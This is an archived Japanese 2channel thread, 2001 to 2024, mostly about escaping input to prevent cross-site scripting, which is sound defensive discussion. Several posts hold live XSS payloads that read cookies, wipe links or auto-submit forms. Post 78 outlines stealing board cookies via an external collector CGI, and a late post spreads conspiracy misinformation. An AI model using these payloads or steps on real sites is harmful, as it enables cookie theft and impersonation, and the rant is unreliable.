2ちゃんねる ■掲示板に戻る■ 全部 1- 最新50    

クロスサイトスクリプティング対策

1 :名無しさん@お腹いっぱい。:01/10/27 10:37 ID:AENF9z2S.net
http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf

簡単にいって、フォームの入力をサーバサイドで処理してHTMLと
して出力する時に、文字のエスケープを適切に行わないと、
Cookieを取得するJavaScriptを埋め込み&出力結果を別サイトに
リダイレクトする、というような方法を使ってCookieを第三者に
盗まれる可能性がある、ということです。

上の資料を参考にしながら、
それぞれの処理系における、どのようの文字列エスケープを行うべきか、
といったサーバサイドの対策に関する情報を交換していきたいと思います。

2 :名無しさん@お腹いっぱい。:01/10/27 11:07 ID:AENF9z2S.net
とりあえずは、Perlの場合で、BBSやチャットだと、
一番カタイのはタグ禁止ということにして<,>を文字実体参照に変換してしまう
のが手っ取り早いと思います。

3 :名無しさん@お腹いっぱい。:01/10/28 03:25 ID:ZO04qCcD.net
セキュリティ板に載ってました、クロスサイトスクリプティング脆弱性の
最近の具体例が。
http://memo.st.ryukoku.ac.jp/archive/200110.month/index.html
のArticle 1756。見ればわかりますがHTMLタグのエスケープ処理を
忘れてるものと思われます。<SCRIPT>タグなんか埋め込まれた日には
色々悪さされそうです。

4 :名無しさん@お腹いっぱい。:01/11/02 23:53 ID:bu2IICno.net
本気で対策したい人たちが読むことを期待して。
少なくともFORMから入力されたパラメタは、全て読み込んだ時点で
実体参照に置換してしまう(汚染チェックも行う)。
s/&/&/g
s/</</g
s/>/>/g
s/"/"/g
URLやHTTPヘッダもそうするべきだけど、そこまでは辛いか?後は比較などで、
元の文字列でなければ困るところだけ、一時的に元に戻すようにする。
s/</</g
s/>/>/g
s/"/"/g
s/&/&/g
(上記は2chがちゃんと処理してなかった場合ちゃんと見えないかも。
面倒なんでその場合はページのソースを見てください)
必要な箇所での戻し忘れがあった場合の不都合は、比較的簡単に目に見えるので
どってこたない。置換を忘れた場合は見つけにくい上にセキュリティ問題になる
ことを考えれば、これくらい徹底した方がいいのでは?

5 :名無しさん@お腹いっぱい。:01/11/03 00:20 ID:zLquoryW.net
男は黙って tr/\W//d

6 :4:01/11/03 00:48 ID:???.net
s/&/&amp;/g
s/</&lt;/g
s/>/&gt;/g
s/"/&quot;"/g
だ。下のは
s/&amp;/&/g
s/&lt;/</g
s/&gt;/>/g
s/&quot;"/"/g
ふー…ちゃんと&と"も置換してよ。

7 :age:01/11/03 00:52 ID:???.net
age

8 :age:01/11/03 17:57 ID:???.net
age

9 :名無しさん@お腹いっぱい。:01/11/03 19:10 ID:???.net
&をエスケープしないのはヤバーイよ!
ネスケ4で見てね。

10 :9:01/11/03 19:17 ID:???.net
つづく

11 :10:01/11/03 19:17 ID:???.net
こんなことも(;´Д`)

12 :10:01/11/03 19:24 ID:???.net
シパーイシターヨ

13 :12:01/11/03 19:25 ID:???.net
これでどーよ、ネスケ4

14 :名無しさん@お腹いっぱい。:01/11/04 14:11 ID:???.net
神が降臨シテルヨ

15 :神じゃないけど:01/11/05 23:36 ID:???.net
ネスケで見てる人はあまりいなかったのかage

16 :名無しさん@お腹いっぱい。:01/11/05 23:40 ID:gvBrmPxu.net
真の神は、やっぱりMSのPassportでしょ。

http://www.zdnet.co.jp/news/0111/05/e_wallet.html

17 :名無しさん@お腹いっぱい。:01/11/06 01:05 ID:???.net
神はみんなに平等にcookieを読む権利を与えたのだ

18 :名無しさん@お腹いっぱい。:01/11/06 01:28 ID:???.net
パンが無ければCookieを食べればいいじゃない。

19 : :01/11/06 13:33 ID:hz5ky/YY.net
くそ・・・ネスケ4で見たら落ちたよ(涙)

20 :名無しさん@お腹いっぱい。:01/11/06 15:28 ID:???.net
>>13
そーいや、それについての警告を見た事無いな。
何処かに名文ないものかな?

21 :名無しさん@お腹いっぱい。:01/11/06 16:19 ID:8Is73jkR.net
>>20
これとか:
http://www.securityfocus.com/archive/1/50782
この著者は先日MicrosoftのPassportの問題を指摘した人物。
Apache Softoware Foundationのメンバーで、1.3.11の同脆弱性を直した人。

22 :名無しさん@お腹いっぱい。:01/11/09 00:12 ID:ShSwDwY3.net
いや明日仕事で、うちの会社で開発したwebサービスの
クロスサイトスクリプティング対策をやんなきゃいけなくって、
できる限りヤバーイのを発見しないといけないんだけどさー、
どうするのがいいかねぇ。

23 :名無しさん@お腹いっぱい。:01/11/09 00:42 ID:???.net
>>21
英語か:-(
誰か和訳してくれないものかな。

24 :名無しさん@お腹いっぱい。:01/11/09 21:56 ID:QF/0zNjv.net
>22
まず、実体参照への変換関数(メソッド)を固定の記号に置き換えて返すように変更して実行してみる。
例えば"====================="とか。
そして、フォームの全てのパラメタに"**************************************************"とかの
目立つ文字列を入れてみて、後者がブラウザ上に現れたらアウト。
※hiddenフィールドもチェックしないとね

ただしそれだけだと、URLやHTTPヘッダのチェックが見落としやすいな…。
URL等をブラウザに表示している箇所は、"*********..."が表示されるはずだからそうなっていない
生のURLやUser-Agent等のヘッダの文字列が表示されていたらアウトなわけだけど…。

25 :名無しさん@お腹いっぱい。:01/11/09 21:57 ID:QF/0zNjv.net
後は全エラー画面をチェックしないといけないが、これは画面よリソースをチェックした方が早いだろうなぁ。

26 :名無しさん@お腹いっぱい。:01/11/09 23:25 ID:???.net
PHP 使ってますが。
フォームからのものとか、REMOTE_ADDR、REMOTE_HOSTなど
すべて strip_tags() してますが、安全でしょうか?

27 :名無しさん@お腹いっぱい。:01/11/10 00:07 ID:9tmYIcvX.net
たぶん。としかいえんなぁ。変換関数が組み込みのものだと24に書いたみたいなテスト方法は駄目だね。
要はそれを忘れてないかどうかが問題なので。
環境変数等から変数に代入する時点で変換するというポリシーが貫けているなら、
この問題に対してはほぼ安全と思う。

28 :26:01/11/10 00:58 ID:???.net
>>27
とりあえずhiddenを含め全部やってるはずなので、一応安心しておきます。

29 :cookieが表示されない:01/11/12 16:46 ID:???.net
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ

http://www.solutions.fi/index.cgi/extra_iebug?lang=eng
でamazon.co.jpを読むと(事前にamazon.co.jpのcookieを取り込んである)
MSIE cookie vulnerability test page
This page displays the cookies found on your browser for site amazon.co.jp:
Cookies:
No cookies found for site...
Click here to make new search for cookies.
−−−−−
アクティブスクリプトに対して「プロンプトを表示」で表示されたら
はい(Y)を選択する。
こんなダイアログ−http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/ie6-script-dialog.png
−−−−−
アクティブスクリプトを実行しなければ "; document.location=url; と表示される。
−−−−−
デモが表示された後、「戻る」と
警告: ページの有効期限切れ 要求したページは、フォームで送信された情報を使用して作成されました。このページは、もう利用できません。セキュリティ保護のため、情報は自動的には再送信されません。
情報を再送信し、この Web ページを表示するには、ツール バーの [更新] ボタンをクリックしてください。 となる。

30 :名無しさん@お腹いっぱい。:01/11/12 17:13 ID:???.net
>>29
IE5.5とIE6しか再現しないそうだ

31 :>30:01/11/12 18:24 ID:???.net
IEは5.01SP2です。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-055
によると、
テストしたバージョン :
マイクロソフトは Internet Explorer 5.5 SP2 および 6 のテストを行い、これらの脆弱性による影響を評価しました。それ以前のバージョンに関してはサポート (英語情報) の対象となっていないため、この脆弱性による影響は不明です。
とのこと。
ということは、5.01でも危険ということだろうか。

32 :名無しさん@お腹いっぱい。:01/11/26 07:56 ID:???.net
age

33 :名無しさん@お腹いっぱい。:01/12/17 07:29 ID:BojNQSph.net
age

34 :テスト:01/12/19 07:01 ID:RLJpoDQa.net
http://pc.2ch.net/&{document.write(document.cookie)};

35 :テスト:01/12/19 07:06 ID:???.net
http://pc.2ch.net/&{document.cookie};

36 :名無しさん@お腹いっぱい。:02/01/12 14:08 ID:???.net
age

37 : :02/01/26 08:50 ID:SUrQysHb.net
a

38 :名無しさん@お腹いっぱい。:02/01/26 11:51 ID:???.net
こんなのmail欄に入れたらどうなるんだろう?
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};

39 :名無しさん@お腹いっぱい。:02/01/26 13:20 ID:???.net
>38
自分でやってみてよ(笑)

40 :名無しさん@お腹いっぱい。:02/01/26 13:47 ID:???.net
メール欄が長すぎます・・・だって(笑)

&{for(var i=0;document.links[i];i++)document.links[i].href='';};
これは大丈夫やった。

41 :名無しさん@お腹いっぱい。:02/01/26 14:05 ID:???.net
>40
どこでやってきたの?(笑)

42 :名無しさん@お腹いっぱい。:02/01/26 17:32 ID:???.net
>>41
色んなところ。反応が一つもないところを見ると
NN4でスクリプトONにしてる奴、あんまおらんのかな?

43 :名無しさん@お腹いっぱい。:02/01/26 22:09 ID:???.net
age

44 :名無しさん@お腹いっぱい。:02/01/26 22:19 ID:???.net
age

45 :ネスケ4.7使用者:02/01/27 10:13 ID:???.net
>>42
ひいい・・・・2ちゃんで窓が出たよう・・・。

46 :名無しさん@お腹いっぱい。:02/01/27 10:17 ID:???.net
>45
(笑)

47 :仕様書無しさん:02/01/27 23:08 ID:???.net
>>40
分割すればいいみたい。>>12>>13

48 :名無しさん@お腹いっぱい。:02/02/06 03:45 ID:???.net
テスト

49 :名無しさん@お腹いっぱい。:02/02/06 03:46 ID:dMmdiZ7p.net
大手検索サイトに見るクロスサイトスクリプティングの脆弱性の実態(2002.2.4)
https://www.netsecurity.ne.jp/article/1/3860.html

50 :テスト:02/02/08 00:23 ID:???.net


51 :テスト:02/02/08 00:28 ID:???.net


52 :名無しさん@お腹いっぱい。:02/02/08 13:44 ID:???.net
>日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ
>が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう
>になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。

タグ可の掲示板はみんな着尺製ありだな
http://pc.2ch.net/test/read.cgi/sec/1008926076/l10

53 :名無しさん@お腹いっぱい。:02/02/09 01:21 ID:???.net
F=Function;fs=document.forms;

l0=new F('f=fs[fs.length-1]');
l1=new F('es=f.elements;');
l2=new F('a=es[0];b=es[2];');
l3=new F('c=es[3];d=es[4];');
l4=new F('a.value=navigator.userAgent;');
l5=new F('b.value=\'fusianasan\';');
l6=new F('c.value=\'\';');
l7=new F('d.value=\' \';');

l8=new F('es[1].click();');

lx=new F('l0();l1();l2();l3();');
ly=new F('l4();l5();l6();l7();');
lz=new F('l8();');

l=new F('lx();ly();lz();');window.onload=l;

54 :名無しさん@お腹いっぱい。:02/02/12 11:32 ID:???.net
>>52
>着尺製

読めない…。

55 :名無しさん@お腹いっぱい。:02/02/12 11:44 ID:???.net
>>54
> >着尺製
「脆弱性」の (2ch的?) 誤読だと思われ。

正しくは「もろよわせい」と読むらしい。


56 :名無しさん@お腹いっぱい。:02/02/12 12:06 ID:???.net
>>55
http://pc.2ch.net/test/read.cgi/sec/1008620296/
http://pc.2ch.net/test/read.cgi/sec/1008620296/17

57 :名無しさん@お腹いっぱい。:02/02/12 22:55 ID:???.net
>>22
で、22はお腹いっぱいヤバゲなの見つかったのかな?
SSLなページの確認はメンドーでないかい? >all
アホプログラマーの重箱の隅つつくのも疲れてきたぞ。(藁

58 :名無しさん@お腹いっぱい。:02/02/19 00:17 ID:???.net
> SSLなページの確認はメンドーでないかい?

なぜに?

59 :57:02/02/19 01:53 ID:???.net
漏れがバカだから。とりあえずパケットキャプチャーしてどんな内容送ってるのか見ようと思うんだけど。
IEなんかのクライアントで見て、値が固定されてるもののテストってどうしてますか?
例えば買い物の個数とかサーバ側でエスケープ処理してるか確認したい訳で。
POSTメソッドの値を色々試すのに良いツールってないですかねぇ。HTMLエディタで書き換える?

60 :名無しさん@お腹いっぱい。:02/02/19 02:02 ID:???.net
http://www.mountsystem.ne.jp/
ここのTantanCGI

61 :57:02/02/19 07:49 ID:???.net
>>60
すっ、すばらしい...。ありがとう御座います。感謝感激!
これでもっと重箱の隅つっけそうです。(藁

62 :a:02/06/27 00:50 ID:awVCb82d.net
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};

63 :nobodyさん:02/12/06 16:58 ID:???.net
ここで配布してるスクリプトも脆弱性の問題あり?

http://www.onpuch.jp/files/onpuch.zip

64 :nobodyさん:03/01/10 01:43 ID:QhQLqNIU.net
Struts使おう。

65 :山崎渉:03/01/16 03:36 ID:???.net
(^^)

66 :奥さん ◆mL2ZRk1cK. :03/01/18 07:27 ID:AxdRMTC9.net
d

67 :奥さん ◆0Z6Yhsb88E :03/01/18 07:27 ID:AxdRMTC9.net
aq

68 :奥さん ◆E39m/9K3xY :03/01/18 07:28 ID:AxdRMTC9.net
qwe

69 :奥さん ◆8WgvSovIKg :03/01/18 07:28 ID:AxdRMTC9.net
qwer

70 :奥さん ◆ABM5odHy/Q :03/01/18 07:29 ID:AxdRMTC9.net
12345

71 :奥さん ◆bc.v5kgifQ :03/01/18 07:30 ID:AxdRMTC9.net
hfjfjf

72 :奥さん ◆IGEMrmvKLI :03/01/18 07:31 ID:AxdRMTC9.net
vbncnnb

73 :奥さん ◆tsGpSwX8mo :03/01/18 07:31 ID:AxdRMTC9.net
hhhhhhhh

74 :奥さん ◆Mjk4PcAe16 :03/01/18 07:32 ID:AxdRMTC9.net
fhfhfhfhfh

75 :nobodyさん:03/01/19 15:22 ID:???.net
荒らされてる

76 :nobodyさん:03/01/19 15:58 ID:???.net
XSS対策のひとつとして、「エスケープ処理」がある。
これはCGIが扱うパラメータが多くなってくると、ついつい忘れてしまう煩雑で面倒な処理だが、
もしあなたがPerlユーザなら、HTML::Templateを使うことによってエスケープを
テンプレート側に記述し、プログラム側から完全に追い出してしまうことができる。

<input type="hidden" value="<tmpl var="aniti_xss_value" escape="url">">
<input type="text" value="<tmpl var="aniti_xss_text" escape="html">">

最後のescape属性に注目だ。これを指定してやるだけで、
テンプレートにセットした変数は適切にエスケープされるようになる。
もう、escape関数を呼びまくる必要はないんだ!ひゃっほう!

ps.この情報がXSS対策に頭を悩ますCGI製作者の助けになることを祈ってるよ。

77 :nobodyさん:03/01/19 16:01 ID:???.net
ヽ(゚∀゚)ノヒャホー

78 :nobodyさん:03/01/21 19:45 ID:eVlnRoM0.net
対策ではなくクキー盗む方法なのだが。
JBBSなどレンタル系の掲示板で使える。(htmlにログを表示して、javascriptでクッキーを読み出すもの)
レンタル系の掲示板は、自分が書き込んだ掲示板以外の板にもクッキーが適応されるところが多い。
(たとえば、http://jbbs.shitaraba.com/business/1/に書き込むとhttp://jbbs.shitaraba.com/business/2/の板にも適応される。)
これを利用して、自分の掲示板に書き込まれなくてもクッキーに入っているデータを取得できる。

具体的方法として
1.GET(QUERY_STRING)からのデータをテキストに保存するCGIを作成し、適当なフリーサーバに設置
2.ターゲットと同じレンタルBBSを借りる。
3.HTMLクッキー取得部分を調べてjavascriptで1のCGIに渡す。
4.ターゲットの掲示板にそれらしい理由を付けてカキコ

79 :nobodyさん:03/01/21 23:40 ID:ByrQNqOs.net
クッキーのpathを / とかにしてるんだろうね。
名前が漏れるくらいはなんでもないけど
トリップやキャップもクッキーに入ってるとなりすましが出来ると。

80 :nobodyさん:03/01/26 15:26 ID:???.net
XSS 脆弱性で Basic 認証のパスワードも盗まれるらしいぞ
http://memo.st.ryukoku.ac.jp/archive/200301.month/5237.html
(((;゚Д゚))ガクガクブルブル

81 :nobodyさん:03/01/28 20:54 ID:wWZkstRp.net
>>80
ウゲ
でも
> サーバのTRACEメソッドが機能している場合
ってどういう場合なの?

82 :山崎渉:03/04/17 12:26 ID:???.net
(^^)

83 :山崎渉:03/04/20 06:06 ID:???.net
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

84 :nobodyさん:03/05/11 20:11 ID:???.net
TRACE / HTTP/1.1
Host: localhost
Authorization: Basic

HTTP/1.1 200 OK
Date: Sun, 11 May 2003 11:07:46 GMT
Server: Apache/1.3.27
Transfer-Encoding: chunked
Content-Type: message/http

50
TRACE / HTTP/1.1
Authorization: Basic lG+/r4+/j6+/64FgKHc=
Host: localhost


0

(((;゚Д゚))ガクガクブルブル

85 :山崎渉:03/05/22 02:10 ID:???.net
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

86 :山崎渉:03/05/28 17:16 ID:???.net
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

87 :山崎 渉:03/07/15 11:18 ID:???.net

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

88 :山崎 渉:03/08/02 02:34 ID:???.net
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

89 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:12 ID:???.net
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

90 :山崎 渉:03/08/15 23:09 ID:???.net
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

91 :nobodyさん:03/08/28 13:53 ID:5epBRgUL.net
2chにはもうXSS使える穴は無い?

92 :nobodyさん:03/08/29 01:04 ID:???.net
半角で穴見つかったのが最後かな?

93 :nobodyさん:03/08/29 14:52 ID:???.net
そうか…
XSS使えばフレームでの別ドメインの制限が回避出来るんだけどなー…

94 :nobodyさん:03/12/27 14:03 ID:6Fk7/T/f.net
XSSをさらすスレはここですか?

95 :nobodyさん:2005/11/20(日) 11:58:56 ID:???.net
ttp://www.creators-fukuoka.com/
クロスサイトスクリプティング出来る?

96 :nobodyさん:2006/08/07(月) 13:26:57 ID:???.net
保守

97 :nobodyさん:2006/09/28(木) 06:10:16 ID:???.net
http://pc8.2ch.net/test/read.cgi/hp/1145956119/413

98 :nobodyさん:2008/05/08(木) 19:41:05 ID:CmE1kuyM.net
age

99 :nobodyさん:2008/08/22(金) 19:39:26 ID:???.net
ttp://youtube2.in/

<
>
"

あたりエスケープできてなくね。

100 :nobodyさん:2008/08/22(金) 19:40:33 ID:???.net
age

101 : 忍法帖【Lv=6,xxxP】 :2011/05/19(木) 08:58:32.38 ID:???.net
tes

102 :nobodyさん:2011/05/22(日) 16:35:47.30 ID:riL4CCVW.net
            _
        r-、' ´   `ヽr-、
       ィ7 /l: ハヽハ トヾ    駄スレを隠すことは、この俺が許さん!
        '|l |'´_` ´_ `| ||    信念に基づいて行動する。
        | |´ヒ}   ヒ}`! l|   それを人は正義と言う。
   __ノ゙). 从 l,  _'_.  |从   今俺が行ってることは、上げ荒らしではない。
 ,_'(_ ノ_ヽ ヾl.> - ,イ;リ    正義という名の粛清だぁ!
 { f:テ} {'f:テ}',/\ヽ--//ヽ    
 ヽ,r─‐ 、ィ .、、 i l>Y<! i '、    バーニング!
 / iゝ_ノ iヽ /l   |l  l   ',
 lンヽ/ムノじ

103 :nobodyさん:2012/10/19(金) 02:23:34.33 ID:???.net
あげ

104 :nobodyさん:2012/10/19(金) 02:24:29.53 ID:F/2XWufo.net
あげそこなった

105 :" onmouseover="alert(1):2014/07/19(土) 22:37:48.57 ID:CCECIglIU
"'><marquee>

106 :nobodyさん:2015/11/04(水) 19:17:29.07 ID:gcyCvqHq.net
転職時の注意事項。
下記の条件が全て当てはまる会社にご注意下さい。

・IT系 in Tokyo
・転職会議で2.5点
・転職会議の「その他>2ch情報」の欄で過去の労基2chスレが表示される

107 :nobodyさん:2017/01/21(土) 19:02:09.87 ID:iuL6ICc7.net
ぬるぽ

108 :nobodyさん:2017/12/30(土) 15:46:21.84 ID:YhlYw6jg.net
誰でも簡単にネットで稼げる方法など
参考までに、
⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。

グーグル検索⇒『半藤のブブイウイウレレ』

4DKB1XYW1O

109 :nobodyさん:2019/02/10(日) 00:29:53.80 ID:irY2hutm.net
私はユーザーとして、2ちゃんねるでこのクロスサイトスクリプティングをされた可能性があるのですが、
もしされてしまった後はどうしたら良いでしょうか?
教えてください。
大変困っています。

110 :プーチン発の危機:2022/02/26(土) 12:09:40.67 ID:WEIXupXE.net
ウクライナ危機、米国は日本の“弱腰対応”を許さない構え 遠のく「北方領土返還」

111 :ロシア、外貨の両替停止 欧米制裁で深刻な不足か:2022/03/10(木) 02:41:37.90 ID:ZzSzzF4L.net
ロシア中央銀行は9日、市中の銀行が国民に外貨を売ることを停止すると発表した。

 これを受け、外貨両替ができなくなる。ウクライナ侵攻に伴う欧米の制裁で中銀が保有する外貨準備が凍結されたため、深刻な外貨不足に見舞われているもようだ。

112 :nobodyさん:2024/01/26(金) 10:35:32.60 ID:vUVMiSlv7
ワクチン打って死亡しまくってる事実のみならす゛核汚染水たれ流しても海水の放射能濃度は基準を下回ってるだの人の命より拝金の
プロパカ゛ンタ゛放送局た゛らけでほとんと゛報道されていないか゛今年5月にはフクシマ沖の魚から18000ヘ゛クレ儿(━般人の年間被曝限度の1/3)もの
セシウ厶が検出されてるのが現実だしそんな新鮮なセシウ厶魚を売りつけるためにタダ同然の運送費て゛都心まて゛数珠つなぎて゛鉄道の30倍以上
もの莫大な温室効果カ゛スをクソ航空機にまき散らさせながら海外やらのバ力に売りつけて氣候変動させて地球破壞して洪水,土砂崩れ,暴風
熱中症にと災害連發させて住民の生命と財産を強奪して切り売りして破壊して『自然のことた゛から仕方か゛ないねえ」だの金て゛雇ったかのような
ハ゛カのヰン夕ヒ゛ュ‐まて゛織り交ぜながら洗脳報道を繰り返して国民た゛まくらかして世界最惡の脱炭素拒否テ口国家に送られる不名誉賞化石賞か゛
4連続て゛送られたりと世界中から非難されてる現実すらほとんと゛報道しないクソシナまでドン引きの報道統制腐敗國家日本
魚の輸入だの日本に行くた゛の嫌がるよう世界中の人々に真実を広めて自民公明の鬼畜な陰謀を阻止しよう!
(ref.) ttps://www.call4.jp/info.php?type=items&id=I0000062
ttps://haneda-project.jimdofree.com/ , ttps://flight-route.com/
ttps://n-souonhigaisosyoudan.amebaownd.com/

24 KB
新着レスの表示

掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★